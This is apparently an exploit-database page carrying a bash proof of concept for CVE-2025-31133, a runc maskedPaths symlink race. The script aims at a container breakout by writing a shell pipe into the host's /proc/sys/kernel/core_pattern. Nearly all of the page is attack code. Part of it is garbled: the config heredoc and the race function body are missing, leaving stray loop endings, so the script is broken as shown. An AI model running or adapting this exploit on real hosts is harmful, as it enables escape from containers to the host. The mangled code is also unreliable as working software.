Share
## https://sploitus.com/exploit?id=9B6F99FA-39EA-5A7D-88A2-02E9B24BEC12
## CVE-2025-31133 runc maskedPaths Exploit PoC
> **WARNING:**
> This PoC attempts host code execution via runc maskedPaths race.
> For educational and authorized lab use only.
```bash
#!/bin/bash
# CVE-2025-31133 runc maskedPaths symlink race exploit
# This PoC performs a real breakout: writes core_pattern to invoke /bin/sh on the host.
# WARNING: This WILL attempt host code execution. Use only in isolated, disposable labs you fully control.
set -euo pipefail
RUNC_BIN="/usr/local/bin/runc"
CONTAINER_ROOTFS="./rootfs"
CONTAINER_NAME="cve31133poc"
echo "[*] runc version: $($RUNC_BIN --version | head -1)"
echo "[*] Make sure this is a known vulnerable runc version (CVE-2025-31133)."
# Fresh rootfs with static /dev
rm -rf "$CONTAINER_ROOTFS"
mkdir -p "$CONTAINER_ROOTFS"/{proc,dev,sys,bin,tmp}
cp /bin/busybox "$CONTAINER_ROOTFS/bin/sh"
chmod +x "$CONTAINER_ROOTFS/bin/sh"
mknod "$CONTAINER_ROOTFS/dev/null" c 1 3
cat > config.json /dev/null || sleep 1
rm -f "$CONTAINER_ROOTFS/dev/null"
mknod "$CONTAINER_ROOTFS/dev/null" c 1 3
sleep 0.01 2>/dev/null || sleep 1
done
}
echo "[*] Starting symlink race background process."
symlink_race &
RACE_PID=$!
# Start container while race is active
echo "[*] Launching runc run..."
$RUNC_BIN run --detach --bundle . "$CONTAINER_NAME"
sleep 2
echo "[*] Writing to /proc/sys/kernel/core_pattern in container (real exploit)."
$RUNC_BIN exec "$CONTAINER_NAME" /bin/sh -c 'echo "|/bin/sh -i" > /proc/sys/kernel/core_pattern; kill -ABRT $$'
wait $RACE_PID || true
$RUNC_BIN kill "$CONTAINER_NAME" || true
$RUNC_BIN delete "$CONTAINER_NAME" || true
echo "[+] Exploit attempt complete. If successful, you should now have code exec on the host via core_pattern!"